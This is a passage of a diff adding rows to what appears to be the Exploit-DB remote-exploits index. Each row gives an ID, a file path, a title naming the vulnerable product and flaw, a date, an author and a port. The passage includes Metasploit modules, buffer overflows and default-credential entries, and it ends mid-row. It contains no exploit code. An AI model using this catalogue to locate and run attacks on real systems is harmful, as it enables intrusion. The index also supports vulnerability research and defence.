+37655,exploits/windows/remote/37655.c,"Adobe Pixel Bender Toolkit2 - 'tbbmalloc.dll' Multiple DLL Loading Code Execution Vulnerabilities",2012-08-23,coolkaveh,remote,windows, +37688,exploits/php/remote/37688.txt,"PHP 5.3.11/5.4.0RC2 - 'header()' HTTP Header Injection",2011-10-06,"Mr. Tokumaru",remote,php, +37667,exploits/java/remote/37667.rb,"SysAid Help Desk 'rdslogs' - Arbitrary File Upload (Metasploit)",2015-07-21,Metasploit,remote,java, +37668,exploits/windows/remote/37668.php,"Internet Download Manager - OLE Automation Array Remote Code Execution",2015-07-21,"Mohammad Reza Espargham",remote,windows, +37671,exploits/multiple/remote/37671.txt,"Websense Content Gateway - Multiple Cross-Site Scripting Vulnerabilities",2012-08-23,"Steven Sim Kok Leong",remote,multiple, +37729,exploits/windows/remote/37729.py,"FileZilla Client 2.2.x - Remote Buffer Overflow (SEH)",2015-08-07,ly0n,remote,windows, +37731,exploits/windows/remote/37731.py,"PCMan FTP Server 2.0.7 - 'PUT' Remote Buffer Overflow",2015-08-07,"Jay Turla",remote,windows,21 +37746,exploits/windows/remote/37746.py,"Netsparker 2.3.x - Remote Code Execution",2015-08-09,"Hesam Bazvand",remote,windows, +37947,exploits/multiple/remote/37947.txt,"Litespeed Web Server - 'gtitle' Cross-Site Scripting",2012-03-12,K1P0D,remote,multiple, +37949,exploits/linux/remote/37949.txt,"ModSecurity - 'POST' Security Bypass",2012-10-17,"Bernhard Mueller",remote,linux, +37951,exploits/windows/remote/37951.py,"Easy File Sharing Web Server 6.9 - USERID Remote Buffer Overflow",2015-08-24,"Tracy Turben",remote,windows, +37788,exploits/linux/remote/37788.py,"libguac - Remote Buffer Overflow",2012-09-11,"Michael Jumper",remote,linux, +37792,exploits/android/remote/37792.txt,"Google Chrome for Android - com.android.browser.application_id Intent Extra Data Cross-Site Scripting",2012-09-12,"Artem Chaykin",remote,android, +37793,exploits/android/remote/37793.txt,"Google Chrome for Android - Multiple 'file::' URL Handler Local Downloaded Content Disclosure Vulnerabilities",2012-09-12,"Artem Chaykin",remote,android, +37794,exploits/android/remote/37794.txt,"Google Chrome for Android - Local Application Handling Cookie Theft",2012-09-12,"Artem Chaykin",remote,android, +37795,exploits/android/remote/37795.txt,"Google Chrome for Android - Same-origin Policy Bypass Local Symlink",2012-09-12,"Artem Chaykin",remote,android, +37800,exploits/windows/remote/37800.php,"Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064)",2015-08-17,"Mohammad Reza Espargham",remote,windows, +37803,exploits/hardware/remote/37803.txt,"CoSoSys Endpoint Protector - Predictable Password Generation",2012-09-17,"Christopher Campbell",remote,hardware, +37808,exploits/windows/remote/37808.py,"Easy File Management Web Server 5.6 - 'USERID' Remote Buffer Overflow",2015-08-18,"Tracy Turben",remote,windows, +37812,exploits/win_x86/remote/37812.rb,"Symantec Endpoint Protection Manager - Authentication Bypass / Code Execution (Metasploit)",2015-08-18,Metasploit,remote,win_x86,8443 +37814,exploits/python/remote/37814.rb,"Werkzeug - Debug Shell Command Execution (Metasploit)",2015-08-18,Metasploit,remote,python, +37834,exploits/linux/remote/37834.py,"Samba 3.5.11/3.6.3 - Remote Code Execution",2012-09-24,kb,remote,linux, +37840,exploits/windows/remote/37840.txt,"Flash Broker-Based - Sandbox Escape via Forward Slash Instead of Backslash",2015-08-19,KeenTeam,remote,windows, +37841,exploits/windows/remote/37841.txt,"Flash Broker-Based - Sandbox Escape via Unexpected Directory Lock",2015-08-19,KeenTeam,remote,windows, +37842,exploits/windows/remote/37842.txt,"Flash Broker-Based - Sandbox Escape via Timing Attack Against File Moving",2015-08-19,KeenTeam,remote,windows, +37851,exploits/multiple/remote/37851.txt,"Flash Boundless Tunes - Universal SOP Bypass Through ActionSctipt's Sound Object",2015-08-19,"Google Security Research",remote,multiple, +37889,exploits/linux/remote/37889.txt,"YingZhiPython - Directory Traversal / Arbitrary File Upload",2012-09-26,"Larry Cashdollar",remote,linux, +37900,exploits/multiple/remote/37900.txt,"IBM Lotus Notes Traveler 8.5.1.x - Multiple Input Validation Vulnerabilities",2012-09-28,MustLive,remote,multiple, +37952,exploits/windows/remote/37952.py,"Easy Address Book Web Server 1.6 - USERID Remote Buffer Overflow",2015-08-24,"Tracy Turben",remote,windows, +37958,exploits/multiple/remote/37958.rb,"Mozilla Firefox - 'pdf.js' Privileged JavaScript Injection (Metasploit)",2015-08-24,Metasploit,remote,multiple, +37969,exploits/hardware/remote/37969.txt,"FirePass 7.0 SSL VPN - 'refreshURL' Open Redirection",2012-10-21,"Aung Khant",remote,hardware, +37985,exploits/windows/remote/37985.py,"FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution",2015-08-27,"Naser Farhadi",remote,windows,80 +37996,exploits/windows/remote/37996.txt,"Axigen Mail Server - 'Filename' Directory Traversal",2012-10-31,"Zhao Liang",remote,windows, +38003,exploits/windows/remote/38003.py,"PCMan FTP Server 2.0.7 - 'GET' Remote Buffer Overflow",2015-08-29,Koby,remote,windows,21 +38005,exploits/windows/remote/38005.asp,"MS SQL Server 2000/2005 - SQLNS.SQLNamespace COM Object Refresh() Unhandled Pointer",2015-08-29,ylbhz,remote,windows, +38013,exploits/windows/remote/38013.py,"PCMan FTP Server 2.0.7 - 'RENAME' Remote Buffer Overflow",2015-08-29,Koby,remote,windows,21 +38020,exploits/hardware/remote/38020.py,"Huawei (Multiple Products) - Password Encryption",2012-11-13,"Roberto Paleari",remote,hardware, +38049,exploits/multiple/remote/38049.txt,"Greenstone - Multiple Vulnerabilities",2012-11-23,AkaStep,remote,multiple, +38058,exploits/ios/remote/38058.py,"Twitter for iPhone - Man in the Middle Security",2012-11-23,"Carlos Reventlov",remote,ios, +38100,exploits/hardware/remote/38100.txt,"Fortinet FortiWeb (Multiple Appliances) - Multiple Cross-Site Scripting Vulnerabilities",2012-12-01,"Benjamin Kunz Mejri",remote,hardware, +38096,exploits/linux/remote/38096.rb,"Endian Firewall - Password Change Command Injection (Metasploit)",2015-09-07,Metasploit,remote,linux,10443 +38109,exploits/linux/remote/38109.pl,"Oracle MySQL / MariaDB - Insecure Salt Generation Security Bypass",2012-12-06,kingcope,remote,linux, +38124,exploits/android/remote/38124.py,"Google Android - 'Stagefright' Remote Code Execution",2015-09-09,"Joshua J. Drake",remote,android, +38203,exploits/linux/remote/38203.txt,"Schmid Watson Management Console - Directory Traversal",2013-01-09,"Dhruv Shah",remote,linux, +38151,exploits/windows/remote/38151.py,"Microsoft Windows Media Center - Command Execution (MS15-100)",2015-09-11,R-73eN,remote,windows, +38164,exploits/hardware/remote/38164.py,"Belkin Wireless Router - Default WPS PIN Security",2013-01-03,ZhaoChunsheng,remote,hardware, +38170,exploits/android/remote/38170.txt,"Facebook for Android - 'LoginActivity' Information Disclosure",2013-01-07,"Takeshi Terada",remote,android, +38179,exploits/multiple/remote/38179.txt,"Dell OpenManage Server Administrator - Cross-Site Scripting",2013-01-09,"Tenable NS",remote,multiple, +38186,exploits/hardware/remote/38186.txt,"TP-Link NC200/NC220 Cloud Camera 300Mbps Wi-Fi - Hard-Coded Credentials",2015-09-15,LiquidWorm,remote,hardware, +38195,exploits/windows/remote/38195.rb,"Microsoft Windows Media Center - MCL (MS15-100) (Metasploit)",2015-09-15,Metasploit,remote,windows, +38196,exploits/php/remote/38196.rb,"CMS Bolt - Arbitrary File Upload (Metasploit)",2015-09-15,Metasploit,remote,php,80 +38206,exploits/windows/remote/38206.html,"Samsung Kies - Remote Buffer Overflow",2013-01-09,"High-Tech Bridge",remote,windows, +38221,exploits/java/remote/38221.rb,"ManageEngine OpManager - Remote Code Execution (Metasploit)",2015-09-17,Metasploit,remote,java, +38226,exploits/android/remote/38226.py,"Google Android - libstagefright Integer Overflow Remote Code Execution",2015-09-17,"Google Security Research",remote,android, +38227,exploits/windows/remote/38227.txt,"Microsoft Lync 2010 4.0.7577.0 - User-Agent Header Handling Arbitrary Command Execution",2013-01-11,"Christopher Emerson",remote,windows, +38230,exploits/multiple/remote/38230.txt,"Apache OFBiz 10.4.x - Multiple Cross-Site Scripting Vulnerabilities",2013-01-18,"Juan Caillava",remote,multiple, +38233,exploits/hardware/remote/38233.txt,"F5 Networks BIG-IP - XML External Entity Injection",2013-01-21,anonymous,remote,hardware, +38242,exploits/hardware/remote/38242.txt,"Thomson CableHome Gateway (DWG849) Cable Modem Gateway - Information Exposure",2015-09-19,"Matthew Dunlap",remote,hardware, +38248,exploits/multiple/remote/38248.txt,"Multiple Hunt CCTV - Information Disclosure",2013-01-29,"Alejandro Ramos",remote,multiple, +38250,exploits/multiple/remote/38250.html,"Novell Groupwise Client 8.0 - Multiple Remote Code Execution Vulnerabilities",2013-01-31,"High-Tech Bridge",remote,multiple, +38252,exploits/windows/remote/38252.py,"Konica Minolta FTP Utility 1.0 - Remote Command Execution",2015-09-20,R-73eN,remote,windows,21 +38254,exploits/windows/remote/38254.rb,"Konica Minolta FTP Utility 1.00 - Authenticated CWD Command Overflow (SEH) (Metasploit)",2015-09-21,Metasploit,remote,windows,21 +38260,exploits/windows/remote/38260.php,"Konica Minolta FTP Utility 1.0 - Directory Traversal",2015-09-22,shinnai,remote,windows,21 +38302,exploits/multiple/remote/38302.rb,"w3tw0rk / Pitbul IRC Bot - Remote Code Execution (Metasploit)",2015-09-23,Metasploit,remote,multiple,6667 +38308,exploits/hardware/remote/38308.txt,"TP-Link TL-WR2543ND Router - Admin Panel Multiple Cross-Site Request Forgery Vulnerabilities",2013-02-08,"Juan Manuel Garcia",remote,hardware, +38310,exploits/android/remote/38310.c,"Google Android 2.3.5 - PowerVR SGX Driver Information Disclosure",2011-11-03,"Geremy Condra",remote,android, +38313,exploits/multiple/remote/38313.html,"Dell SonicWALL Scrutinizer - Multiple HTML Injection Vulnerabilities",2013-02-14,"Benjamin Kunz Mejri",remote,multiple, +38325,exploits/windows/remote/38325.txt,"Alt-N MDaemon WorldClient And WebAdmin - Cross-Site Request Forgery",2013-02-18,QSecure,remote,windows, +38330,exploits/windows/remote/38330.txt,"Photodex ProShow Producer - Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2013-02-23,"Julien Ahrens",remote,windows, +38340,exploits/windows/remote/38340.py,"PCMan FTP Server 2.0.7 - Directory Traversal",2015-09-28,"Jay Turla",remote,windows,21 +38341,exploits/windows/remote/38341.py,"BisonWare BisonFTP Server 3.5 - Directory Traversal",2015-09-28,"Jay Turla",remote,windows,21 +38346,exploits/bsd/remote/38346.rb,"Watchguard XCS - Remote Command Execution (Metasploit)",2015-09-28,Metasploit,remote,bsd,443 +38352,exploits/windows/remote/38352.rb,"ManageEngine EventLog Analyzer - Remote Code Execution (Metasploit)",2015-09-29,Metasploit,remote,windows,8400 +38356,exploits/hardware/remote/38356.txt,"Foscam < 11.37.2.49 - Directory Traversal",2013-03-01,"Frederic Basse",remote,hardware, +38402,exploits/multiple/remote/38402.rb,"Zemra Botnet (C2 Web Panel) - Remote Code Execution (Metasploit)",2015-10-05,Metasploit,remote,multiple, +38401,exploits/windows/remote/38401.rb,"Kaseya Virtual System Administrator (VSA) - 'uploader.aspx' Arbitrary File Upload (Metasploit)",2015-10-05,Metasploit,remote,windows, +38368,exploits/multiple/remote/38368.txt,"McAfee Vulnerability Manager - 'cert_cn' Cross-Site Scripting",2013-03-08,"Asheesh Anaconda",remote,multiple, +38370,exploits/hardware/remote/38370.txt,"PIXORD Vehicle 3G Wi-Fi Router 3GR-431P - Multiple Vulnerabilities",2015-10-01,"Karn Ganeshen",remote,hardware, +38384,exploits/windows/remote/38384.txt,"Avast! AntiVirus - X.509 Error Rendering Command Execution",2015-10-02,"Google Security Research",remote,windows, +38387,exploits/multiple/remote/38387.txt,"RubyGems fastreader - 'entry_controller.rb' Remote Command Execution",2013-03-12,"Larry W. Cashdollar",remote,multiple, +38388,exploits/windows/remote/38388.txt,"QlikView - '.qvw' File Remote Integer Overflow",2013-03-13,"A. Antukh",remote,windows, +38389,exploits/hardware/remote/38389.txt,"Cisco Video Surveillance Operations Manager - Multiple Vulnerabilities",2013-03-13,b.saleh,remote,hardware, +38394,exploits/windows/remote/38394.py,"BlazeVideo HDTV Player Standard - '.plf' File Remote Buffer Overflow",2013-03-19,metacom,remote,windows, +38536,exploits/hardware/remote/38536.txt,"Barracuda SSL VPN 680 - 'returnTo' Open Redirection",2013-05-27,"Chokri Ben Achor",remote,hardware, +38412,exploits/multiple/remote/38412.txt,"IBM Lotus Domino 8.5.x - 'x.nsf' Multiple Cross-Site Scripting Vulnerabilities",2013-03-26,MustLive,remote,multiple, +38437,exploits/hardware/remote/38437.txt,"Foscam IP (Multiple Cameras) - Multiple Cross-Site Request Forgery Vulnerabilities",2013-04-09,shekyan,remote,hardware, +38454,exploits/multiple/remote/38454.py,"Linux/MIPS Kernel 2.6.36 - 'NetUSB' Remote Code Execution",2015-10-14,blasty,remote,multiple, +38453,exploits/hardware/remote/38453.txt,"ZHONE < S3.0.501 - Multiple Vulnerabilities",2015-10-13,"Lyon Yang",remote,hardware, +38464,exploits/hardware/remote/38464.txt,"Cisco Linksys EA2700 Router - Multiple Vulnerabilities",2013-04-15,"Phil Purviance",remote,hardware, +38481,exploits/hardware/remote/38481.html,"D-Link DIR-865L - Cross-Site Request Forgery",2013-04-19,"Jacob Holcomb",remote,hardware, +38489,exploits/php/remote/38489.rb,"Nibbleblog - Arbitrary File Upload (Metasploit)",2015-10-19,Metasploit,remote,php, +38492,exploits/hardware/remote/38492.html,"TP-Link TL-WR1043N Router - Cross-Site Request Forgery",2013-04-24,"Jacob Holcomb",remote,hardware, +38495,exploits/hardware/remote/38495.html,"Belkin F5D8236-4 Router - Cross-Site Request Forgery",2013-04-25,"Jacob Holcomb",remote,hardware, +38500,exploits/windows/remote/38500.php,"HTML Compiler - Remote Code Execution",2015-10-20,"Ehsan Noreddini",remote,windows, +38501,exploits/hardware/remote/38501.txt,"Cisco Linksys E4200 - '/apply.cgi' Multiple Cross-Site Scripting Vulnerabilities",2013-04-27,"Carl Benedict",remote,hardware, +38505,exploits/php/remote/38505.rb,"Zpanel - Unauthenticated Remote Code Execution (Metasploit)",2015-10-21,Metasploit,remote,php, +38512,exploits/windows/remote/38512.php,"The World Browser 3.0 Final - Remote Code Execution",2015-10-22,"Ehsan Noreddini",remote,windows, +38513,exploits/windows/remote/38513.txt,"TeamSpeak Client 3.0.18.1 - Remote File Inclusion / Remote Code Execution",2015-10-22,Scurippio,remote,windows, +38521,exploits/multiple/remote/38521.c,"Python RRDtool Module - Function Format String",2013-05-18,"Thomas Pollet",remote,multiple, +38522,exploits/linux/remote/38522.txt,"Acme thttpd HTTP Server - Directory Traversal",2013-05-19,Metropolis,remote,linux, +38526,exploits/windows/remote/38526.py,"Easy File Sharing Web Server 7.2 - Remote Overflow (SEH)",2015-10-23,Audit0r,remote,windows, +38535,exploits/osx/remote/38535.rb,"Apple Safari - User-Assisted Applescript Exec Attack (Metasploit)",2015-10-26,Metasploit,remote,osx, +38644,exploits/windows/remote/38644.txt,"SolarWinds Log and Event Manager/Trigeo SIM 6.1.0 - Remote Command Execution",2015-11-06,"Chris Graham",remote,windows, +38541,exploits/php/remote/38541.rb,"Th3 MMA - 'mma.php' Backdoor Arbitrary File Upload (Metasploit)",2015-10-27,Metasploit,remote,php,80 +38549,exploits/multiple/remote/38549.txt,"Apache Struts - OGNL Expression Injection",2013-06-05,"Jon Passki",remote,multiple, +38554,exploits/android/remote/38554.py,"Samsung SecEmailUI - Script Injection",2015-10-28,"Google Security Research",remote,android, +38582,exploits/hardware/remote/38582.html,"Brickcom Multiple IP Cameras - Cross-Site Request Forgery",2013-06-12,Castillo,remote,hardware, +38583,exploits/hardware/remote/38583.html,"Sony CH / DH Series IP Cameras - Multiple Cross-Site Request Forgery Vulnerabilities",2013-06-12,Castillo,remote,hardware, +38584,exploits/hardware/remote/38584.txt,"Grandstream Multiple IP Cameras - Cross-Site Request Forgery",2013-06-12,Castillo,remote,hardware, +38586,exploits/android/remote/38586.txt,"TaxiMonger for Android - 'name' HTML Injection",2013-06-15,"Ismail Kaleem",remote,android, +38587,exploits/multiple/remote/38587.txt,"Monkey HTTP Daemon Mandril Security Plugin - Security Bypass",2013-06-14,felipensp,remote,multiple, +38591,exploits/hardware/remote/38591.py,"TP-Link TL-PS110U Print Server - 'tplink-enum.py' Security Bypass",2013-06-19,SANTHO,remote,hardware, +38597,exploits/multiple/remote/38597.txt,"Motion - Multiple Vulnerabilities",2013-06-26,xistence,remote,multiple, +38599,exploits/win_x86/remote/38599.py,"Symantec pcAnywhere 12.5.0 (Windows x86) - Remote Code Execution",2015-11-02,"Tomislav Paskalev",remote,win_x86, +38632,exploits/hardware/remote/38632.txt,"Zoom Telephonics (Multiple Devices) - Multiple Vulnerabilities",2013-07-09,"Kyle Lovett",remote,hardware, +38627,exploits/android/remote/38627.sh,"Google Android - 'APK' code Remote Security Bypass",2013-07-03,"Bluebox Security",remote,android, +38633,exploits/multiple/remote/38633.pl,"Intelligent Platform Management Interface - Information Disclosure",2013-07-02,"Dan Farmer",remote,multiple, +38634,exploits/ios/remote/38634.txt,"Air Drive Plus - Multiple Input Validation Vulnerabilities",2013-07-09,"Benjamin Kunz Mejri",remote,ios, +38636,exploits/multiple/remote/38636.txt,"Cryptocat 2.0.21 Chrome Extension - 'img/keygen.gif' File Information Disclosure",2012-11-07,"Mario Heiderich",remote,multiple, +38637,exploits/multiple/remote/38637.txt,"Cryptocat 2.0.22 - Arbitrary Script Injection",2012-11-07,"Mario Heiderich",remote,multiple, +38660,exploits/php/remote/38660.rb,"WordPress Plugin Ajax Load More 2.8.1.1 - PHP Upload (Metasploit)",2015-11-09,Metasploit,remote,php, +38663,exploits/hardware/remote/38663.txt,"Huawei HG630a / HG630a-50 - Default SSH Admin Password on ADSL Modems",2015-11-10,"Murat Sahin",remote,hardware, +38666,exploits/multiple/remote/38666.txt,"Apache Struts 2.2.3 - Multiple Open Redirections",2013-07-16,"Takeshi Terada",remote,multiple, +38667,exploits/windows/remote/38667.py,"ReadyMedia - Remote Heap Buffer Overflow",2013-07-15,"Zachary Cutlip",remote,windows, +38669,exploits/multiple/remote/38669.txt,"MongoDB - 'conn' Mongo Object Remote Code Execution",2013-06-04,"SCRT Security",remote,multiple, +38671,exploits/hardware/remote/38671.txt,"Barracuda CudaTel - Multiple Cross-Site Scripting Vulnerabilities",2013-07-17,"Benjamin Kunz Mejri",remote,hardware, +38680,exploits/linux/remote/38680.html,"xmonad XMonad.Hooks.DynamicLog Module - Multiple Remote Command Injection Vulnerabilities",2013-07-26,"Joachim Breitner",remote,linux, +38824,exploits/hardware/remote/38824.html,"Fortinet FortiAnalyzer - Cross-Site Request Forgery",2013-10-12,"William Costa",remote,hardware, +38692,exploits/hardware/remote/38692.txt,"AlgoSec Firewall Analyzer - Cross-Site Scripting",2013-08-16,"Asheesh kumar Mani Tripathi",remote,hardware, +38694,exploits/windows/remote/38694.txt,"HTC Sync Manager - Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2013-08-11,Iranian_Dark_Coders_Team,remote,windows, +38715,exploits/hardware/remote/38715.txt,"D-Link DIR-815 / DIR-850L - SSDP Command Injection",2015-11-16,"Samuel Huntley",remote,hardware,1900 +38716,exploits/hardware/remote/38716.txt,"D-Link DIR-890L/R - Multiple Buffer Overflow Vulnerabilities",2015-11-16,"Samuel Huntley",remote,hardware,80 +38717,exploits/hardware/remote/38717.txt,"D-Link DIR-866L - Multiple Buffer Overflow Vulnerabilities",2015-11-16,"Samuel Huntley",remote,hardware,80 +38718,exploits/hardware/remote/38718.txt,"D-Link DIR-825 (vC) - Multiple Vulnerabilities",2015-11-16,"Samuel Huntley",remote,hardware,80 +38719,exploits/hardware/remote/38719.txt,"D-Link DIR-818W - Multiple Vulnerabilities",2015-11-16,"Samuel Huntley",remote,hardware,80 +38720,exploits/hardware/remote/38720.txt,"D-Link DIR-817LW - Multiple Vulnerabilities",2015-11-16,"Samuel Huntley",remote,hardware,80 +38721,exploits/hardware/remote/38721.txt,"D-Link DIR-815 - Multiple Vulnerabilities",2015-11-16,"Samuel Huntley",remote,hardware,80 +38722,exploits/hardware/remote/38722.txt,"D-Link DIR-645 - Multiple UPNP Vulnerabilities",2015-11-16,"Samuel Huntley",remote,hardware,80 +38723,exploits/hardware/remote/38723.txt,"D-Link DIR-615 - Multiple Buffer Overflow Vulnerabilities",2015-11-16,"Samuel Huntley",remote,hardware,80 +38724,exploits/hardware/remote/38724.txt,"D-Link DIR-601 - Command Injection",2015-11-16,"Samuel Huntley",remote,hardware,80 +38725,exploits/hardware/remote/38725.txt,"D-Link DIR-880L - Multiple Buffer Overflow Vulnerabilities",2015-11-16,"Samuel Huntley",remote,hardware,80 +38726,exploits/hardware/remote/38726.txt,"D-Link DGL5500 - HNAP Buffer Overflow",2015-11-16,"Samuel Huntley",remote,hardware,80 +38730,exploits/php/remote/38730.py,"ClipperCMS 1.3.0 - Code Execution",2015-11-16,"Curesec Research Team",remote,php,80 +38731,exploits/php/remote/38731.py,"XCart 5.2.6 - Code Execution",2015-11-16,"Curesec Research Team",remote,php,80 +38732,exploits/php/remote/38732.rb,"Idera Up.Time Monitoring Station 7.0 - 'post2file.php' Arbitrary File Upload (Metasploit)",2015-11-16,Metasploit,remote,php,9999 +38733,exploits/php/remote/38733.rb,"Idera Up.Time Monitoring Station 7.4 - 'post2file.php' Arbitrary File Upload (Metasploit)",2015-11-16,Metasploit,remote,php,9999 +38741,exploits/linux/remote/38741.txt,"Nmap - Arbitrary File Write",2013-08-06,"Piotr Duszynski",remote,linux, +38742,exploits/windows/remote/38742.txt,"Aloaha PDF Suite - Stack Based Buffer Overflow",2013-08-28,"Marcos Accossatto",remote,windows, +38764,exploits/hardware/remote/38764.rb,"F5 iControl - 'iCall::Script' Root Command Execution (Metasploit)",2015-11-19,Metasploit,remote,hardware,443 +38766,exploits/multiple/remote/38766.java,"Mozilla Firefox 9.0.1 - Same Origin Policy Security Bypass",2013-09-17,"Takeshi Terada",remote,multiple, +38797,exploits/php/remote/38797.rb,"Joomla! 3.4.4 Component Content History - SQL Injection / Remote Code Execution (Metasploit)",2015-11-23,Metasploit,remote,php,80 +38802,exploits/multiple/remote/38802.txt,"Oracle GlassFish Server 2.1.1/3.0.1 - Multiple Subcomponent Resource Identifier Traversal Arbitrary File Access",2013-10-15,"Alex Kouzemtchenko",remote,multiple, +38804,exploits/hardware/remote/38804.py,"Level One Enterprise Access Point (Multiple Devices) - 'backupCfg.cgi' Security Bypass",2013-10-15,"Richard Weinberger",remote,hardware, +38805,exploits/multiple/remote/38805.txt,"SAP Sybase Adaptive Server Enterprise - XML External Entity Information Disclosure",2015-11-25,"Igor Bulatenko",remote,multiple, +38809,exploits/php/remote/38809.php,"PHP Point Of Sale - 'ofc_upload_image.php' Remote Code Execution",2013-10-18,Gabby,remote,php, +38810,exploits/hardware/remote/38810.py,"D-Link / PLANEX COMMUNICATIONS - 'RuntimeDiagnosticPing()' Remote Stack Buffer Overflow",2013-10-14,"Craig Heffner",remote,hardware, +38812,exploits/multiple/remote/38812.txt,"DELL Quest One Password Manager - CAPTCHA Security Bypass",2011-10-21,"Johnny Bravo",remote,multiple, +38813,exploits/multiple/remote/38813.txt,"Apache Shindig - XML External Entity Information Disclosure",2013-10-21,"Kousuke Ebihara",remote,multiple, +38818,exploits/multiple/remote/38818.xml,"Openbravo ERP - XML External Entity Information Disclosure",2013-10-30,"Tod Beardsley",remote,multiple, +38821,exploits/android/remote/38821.py,"Google Android - Signature Verification Security Bypass",2013-11-04,"Jay Freeman",remote,android, +38825,exploits/multiple/remote/38825.xml,"IBM Cognos Business Intelligence - XML External Entity Information Disclosure",2013-10-11,IBM,remote,multiple, +38826,exploits/linux/remote/38826.py,"Linux Kernel 3.0.5 - 'ath9k_htc_set_bssid_mask()' Information Disclosure",2013-12-10,"Mathy Vanhoef",remote,linux, +38827,exploits/php/remote/38827.txt,"Nagios XI - 'tfPassword' SQL Injection",2013-12-13,"Denis Andzakovic",remote,php, +38829,exploits/windows/remote/38829.py,"Easy File Sharing Web Server 7.2 - Remote Buffer Overflow (SEH) (DEP Bypass + ROP)",2015-11-30,Knaps,remote,windows, +36025,exploits/windows/remote/36025.py,"Achat 0.150 beta7 - Remote Buffer Overflow",2015-02-08,"KAhara MAnhara",remote,windows, +38845,exploits/multiple/remote/38845.txt,"SKIDATA Freemotion.Gate - Unauthenticated Web Services Multiple Command Execution Vulnerabilities",2013-11-19,"Dennis Kelly",remote,multiple, +38846,exploits/multiple/remote/38846.txt,"Nginx 1.1.17 - URI Processing SecURIty Bypass",2013-11-19,"Ivan Fratric",remote,multiple, +38849,exploits/cgi/remote/38849.rb,"Advantech Switch - Bash Environment Variable Command Injection (Shellshock) (Metasploit)",2015-12-02,Metasploit,remote,cgi, +38850,exploits/hardware/remote/38850.txt,"Thomson Reuters Velocity Analytics - Remote Code Injection",2013-11-22,"Eduardo Gonzalez",remote,hardware, +38851,exploits/hardware/remote/38851.html,"LevelOne WBR-3406TX Router - Cross-Site Request Forgery",2013-11-15,"Yakir Wizman",remote,hardware, +38859,exploits/windows/remote/38859.rb,"Oracle BeeHive 2 - voice-servlet processEvaluation() (Metasploit)",2015-12-03,Metasploit,remote,windows,7777 +38860,exploits/windows/remote/38860.rb,"Oracle BeeHive 2 - voice-servlet prepareAudioToPlay() Arbitrary File Upload (Metasploit)",2015-12-03,Metasploit,remote,windows,7777 +38900,exploits/php/remote/38900.rb,"phpFileManager 0.9.8 - Remote Code Execution (Metasploit)",2015-12-08,Metasploit,remote,php,80 +38905,exploits/multiple/remote/38905.rb,"Atlassian HipChat for Jira Plugin - Velocity Template Injection (Metasploit)",2015-12-08,Metasploit,remote,multiple,8080 +38910,exploits/windows/remote/38910.txt,"Hancom Office - '.hml' File Processing Heap Buffer Overflow",2013-12-19,diroverflow,remote,windows, +38911,exploits/windows/remote/38911.txt,"Microsoft Windows Media Center Library - Parsing Remote Code Execution aka 'self-executing' MCL File",2015-12-09,"Eduardo Braun Prado",remote,windows, +38912,exploits/windows/remote/38912.txt,"Microsoft Windows Media Center - '.Link' File Incorrectly Resolved Reference (MS15-134)",2015-12-09,"Core Security",remote,windows, +38918,exploits/windows/remote/38918.txt,"Microsoft Office / COM Object - 'els.dll' DLL Planting (MS15-134)",2015-12-09,"Google Security Research",remote,windows, +38923,exploits/windows/remote/38923.txt,"Apple Safari For Windows - PhishingAlert Security Bypass",2013-12-07,Jackmasa,remote,windows, +39097,exploits/linux/remote/39097.txt,"RedHat Piranha - Remote Security Bypass",2013-12-11,"Andreas Schiermeier",remote,linux, +38964,exploits/hardware/remote/38964.rb,"Siemens Simatic S7 1200 - CPU Command Module (Metasploit)",2015-12-14,"Nguyen Manh Hung",remote,hardware,102 +38968,exploits/windows/remote/38968.txt,"Microsoft Office / COM Object - DLL Planting with 'comsvcs.dll' Delay Load of 'mqrt.dll' (MS15-132)",2015-12-14,"Google Security Research",remote,windows, +38973,exploits/multiple/remote/38973.rb,"Legend Perl IRC Bot - Remote Code Execution (Metasploit)",2015-12-14,Metasploit,remote,multiple, +38974,exploits/multiple/remote/38974.rb,"Xdh / LinuxNet Perlbot / fBot IRC Bot - Remote Code Execution (Metasploit)",2015-12-14,Metasploit,remote,multiple, +38982,exploits/jsp/remote/38982.rb,"ManageEngine Desktop Central 9 - FileUploadServlet ConnectionId (Metasploit)",2015-12-15,Metasploit,remote,jsp,8020 +38983,exploits/java/remote/38983.rb,"Jenkins CLI - RMI Java Deserialization (Metasploit)",2015-12-15,Metasploit,remote,java,8080 +39007,exploits/java/remote/39007.txt,"FireEye - Wormable Remote Code Execution in MIP JAR Analysis",2015-12-16,"Tavis Ormandy & Natalie Silvanovich",remote,java, +39008,exploits/windows/remote/39008.py,"Easy File Sharing Web Server 7.2 - GET Buffer Overflow (SEH)",2015-12-16,ArminCyber,remote,windows,80 +39009,exploits/windows/remote/39009.py,"Easy File Sharing Web Server 7.2 - HEAD Request Buffer Overflow (SEH)",2015-12-16,ArminCyber,remote,windows,80 +39018,exploits/multiple/remote/39018.txt,"Oracle Supply Chain Products Suite - Remote Security",2014-01-14,Oracle,remote,multiple, +39074,exploits/cgi/remote/39074.txt,"Seowon Intech WiMAX SWC-9100 Router - '/cgi-bin/diagnostic.cgi?ping_ipaddr' Remote Code Execution",2014-02-03,"Josue Rojas",remote,cgi, +39105,exploits/windows/remote/39105.py,"VideoCharge Studio - 'CHTTPResponse::GetHttpResponse()' Remote Stack Buffer Overflow",2014-02-19,"Julien Ahrens",remote,windows, +39104,exploits/multiple/remote/39104.py,"Dassault Systemes Catia - Remote Stack Buffer Overflow",2014-02-19,"Mohamed Shetta",remote,multiple, +39089,exploits/hardware/remote/39089.txt,"NETGEAR D6300B - '/diag.cgi?IPAddr4' Remote Command Execution",2014-02-05,"Marcel Mangold",remote,hardware, +39114,exploits/ios/remote/39114.txt,"Apple iOS 4.2.1 - 'facetime-audio://' Security Bypass",2014-03-10,"Guillaume Ross",remote,ios, +39115,exploits/multiple/remote/39115.py,"ET - Chat Password Reset Security Bypass",2014-03-09,IRH,remote,multiple, +39119,exploits/windows/remote/39119.py,"KiTTY Portable 0.65.0.2p (Windows XP/7/10) - Chat Remote Buffer Overflow (SEH)",2015-12-29,"Guillaume Kaddouch",remote,windows, +39138,exploits/hardware/remote/39138.html,"ICOMM 610 Wireless Modem - Cross-Site Request Forgery",2014-04-12,"Blessen Thomas",remote,hardware, +39227,exploits/hardware/remote/39227.txt,"FingerTec Fingerprint Reader - Remote Access and Remote Enrolment",2016-01-12,"Daniel Lawson",remote,hardware, +39154,exploits/hardware/remote/39154.txt,"COMTREND CT-5361T Router - 'Password.cgi' Cross-Site 